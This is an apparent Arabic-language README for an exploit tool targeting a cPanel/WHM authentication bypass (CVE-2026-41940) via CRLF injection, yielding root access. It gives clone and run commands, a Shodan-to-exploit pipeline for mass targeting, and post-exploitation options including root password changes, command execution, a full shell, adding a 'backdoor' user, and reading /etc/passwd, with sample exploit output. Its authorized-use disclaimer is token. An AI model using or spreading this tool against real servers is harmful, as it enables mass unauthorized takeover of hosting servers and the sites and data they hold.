
# cPanel وWHM - تجاوز المصادقة عبر حقن CRLF في ملف الجلسة
⚡ صلاحية جذر بدون مصادقة – حقن CRLF في ملف الجلسة ⚡
“سلسلة واحدة تحكمهم جميعًا.”
┌─────────────────────────────────────────────────────────────┐
│ المرحلة 1 ── إنشاء كوكي جلسة قبل المصادقة │
│ المرحلة 2 ── حقن CRLF عبر ترويسة `Authorization` │
│ المرحلة 3 ── تشغيل `do_token_denied` (خام → كاش) │
│ المرحلة 4 ── التحقق من صلاحية جذر WHM عبر JSON API │
└─────────────────────────────────────────────────────────────┘
💥 النتيجة – وصول كامل بصلاحية الجذر إلى WHM، دون الحاجة لأي بيانات اعتماد.
هذا المشروع مُصدَر بموجب رخصة MIT – يمكنك استخدامه وتعديله وتوزيعه بحرية، لكن لا تكن شريرًا 😈.
راجع ملف LICENSE للحصول على التفاصيل.
git clone https://github.com/0xgh057r3c0n/CVE-2026-41940.git && cd CVE-2026-41940
صفر تبعيات – فقط مكتبة Python 3 القياسية.
لا تحتاج إلىpipأوvirtualenvأو أي من تلك الضوضاء.
./CVE-2026-41940.py -u https://target.com:2087
./CVE-2026-41940.py -l targets.txt -t 20 -o results.json
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' | ./CVE-2026-41940.py -t 30
بمجرد اختراقك للجهاز، يمكنك:
--action list--action passwd --passwd "h4ck3d!"--action cmd --cmd "id;whoami"--action shell (طرفية WHM كاملة)--action adduser --new-user backdoor --new-domain evil.com --passwd "pwn3d"cat /etc/passwd--action info$ ./CVE-2026-41940.py -u https://192.168.1.100:2087
الإعدادات:
الأهداف : 1
الخيوط : 10
المهلة : 15 ثانية
الإجراء : فحص فقط
[10:23:15] [SCAN] بدء سلسلة استغلال من 4 مراحل... https://192.168.1.100:2087
[10:23:15] [INFO] تم اكتشاف اسم المضيف الأساسي: server.example.com
[10:23:15] [STEP] المرحلة 1/4 — إنشاء جلسة قبل المصادقة...
[10:23:16] [ OK] المرحلة 1: جلسة قبل المصادقة = 9a7f8e3d2c1b0a9f
[10:23:16] [STEP] المرحلة 2/4 — حقن CRLF عبر ترويسة Authorization...
[10:23:17] [ OK] المرحلة 2: HTTP 302 ← رمز=/cpsess1234567890
[10:23:17] [STEP] المرحلة 3/4 — تشغيل أداة do_token_denied (خام→كاش)...
[10:23:18] [ OK] المرحلة 3: HTTP 401 — تم تشغيل أداة do_token_denied
[10:23:18] [STEP] المرحلة 4/4 — التحقق من صلاحية جذر WHM...
[10:23:18] [INFO] المرحلة 4: HTTP 200 {"version":"11.118.0.63",...}
[10:23:18] [PWND] تم تأكيد CVE-2026-41940 — صلاحية جذر WHM! (v11.118.0.63 — مؤكد أنه قابل للاختراق)
[10:23:18] [PWND] الرمز : /cpsess1234567890
[10:23:18] [PWND] الجلسة : 9a7f8e3d2c1b0a9f
[10:23:18] [PWND] الإصدار : 11.118.0.63
[10:23:18] [PWND] رابط API : https://192.168.1.100:2087/cpsess1234567890/json-api/version
CVE-2026-41940 — اكتمل الفحص
الوقت: 3.2 ثانية · الأهداف: 1
1 هدف قابل للاختراق
[*] الهدف : https://192.168.1.100:2087
[*] الإصدار : 11.118.0.63
[*] الرمز : /cpsess1234567890
[*] رابط API : https://192.168.1.100:2087/cpsess1234567890/json-api/version
[*] الجلسة : 9a7f8e3d2c1b0a9f
[*] الدليل : {"version":"11.118.0.63",...}
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087
جميع الإصدارات الأقل من هذه البنيات قابلة للاختراق.
0xgh057r3c0n – باحث أمني، مهندس عكسي، ومدمن قهوة.
GitHub | Twitter
هذه الأداة مخصصة لأغراض الاختبارات الأمنية المصرح بها والتعليم فقط.
الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. المؤلف والمساهمون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.
استخدمها بمسؤولية، واحصل دائمًا على الإذن أولاً.
🔥 اخترق الكوكب، لكن ابقَ قانونيًا. 🔥
| الخيار | الوصف |
|---|
-u, --url | رابط هدف واحد (مثل https://host:2087) |
-l, --list | ملف يحتوي رابطًا واحدًا في كل سطر |
--hostname | تجاوز ترويسة Host الأساسية (تُكتشف تلقائيًا) |
-t, --threads | عدد الخيوط (الافتراضي: 10) |
--timeout | المهلة بالثواني (الافتراضي: 15) |
--rate-limit | النوم بين الأهداف (بالثواني) |
--action | ما بعد الاستغلال: list, passwd, cmd, exec, info, version, shell, adduser |
--passwd | كلمة مرور جذر جديدة (مع --action passwd) |
--cmd | أمر نظام (مع --action cmd/exec) |
--new-user | اسم مستخدم cPanel جديد (مع --action adduser) |
--new-domain | نطاق cPanel جديد (مع --action adduser) |
-o, --output | حفظ النتائج بصيغة JSON |
| الفرع | الإصدار المُصحَّح | الحالة |
|---|
| 11.110 | 11.110.0.97 | 🛡️ تم الإصلاح |
| 11.118 | 11.118.0.63 | 🛡️ تم الإصلاح |
| 11.126 | 11.126.0.54 | 🛡️ تم الإصلاح |
| 11.132 | 11.132.0.29 | 🛡️ تم الإصلاح |
| 11.134 | 11.134.0.20 | 🛡️ تم الإصلاح |
| 11.136 | 11.136.0.5 | 🛡️ تم الإصلاح |